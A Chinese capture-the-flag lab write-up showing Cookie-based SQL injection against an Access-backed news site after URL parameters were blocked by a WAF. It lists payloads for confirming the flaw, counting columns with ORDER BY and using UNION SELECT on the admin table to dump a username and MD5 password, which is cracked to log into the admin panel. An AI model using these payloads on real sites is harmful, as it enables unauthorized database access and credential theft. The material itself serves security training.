Access注入之Cookie注入
我们进入新闻页面,随便点击一条新闻进入
我们通过测试发现URL传参是有检测的,有WAF进行拦截,于是我们换一种思路,测试一下Cookie注入
我们通过测试Cookie传参id值
判断注入存在
设置Cookie:
document.cookie="id="+escape("171")
访问网址:
http://kypt8004.ia.aqlab.cn/shownews.asp
页面返回的是id=171的页面,可以证明id传参是有效的,可能存在Cookie注入
继续测试证明注入存在:
document.cookie="id="+escape("171 and 1=1") #页面正常
document.cookie="id="+escape("171 and 1=2") #页面异常
判断字段数
document.cookie="id="+escape("171 order by 10") #页面正常
document.cookie="id="+escape("171 order by 11") #页面异常
得出字段数为10
判断显错点
这里有一点需要注意的是Access数据库与MySQL数据库不同
Access数据库进行查询时必须填写正确的表名才能查询
document.cookie="id="+escape("171 and 1=2 union select 1,2,3,4,5,6,7,8,9,10 from admin")
得出显错点为2,3位
查询数据
document.cookie="id="+escape("171 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin")
得出username=admin&password=b9a2a2b5dffb918c
我们注意到这个password是个md5值,于是我们去解密以下
得到密码为:welcome
于是我们去登陆网站后台
后台地址:http://kypt8004.ia.aqlab.cn/admin/Login.asp
登陆后得到最终flag为:zkz{welcome-control}
原文:https://www.cnblogs.com/gaojia-hackerone/p/15226822.html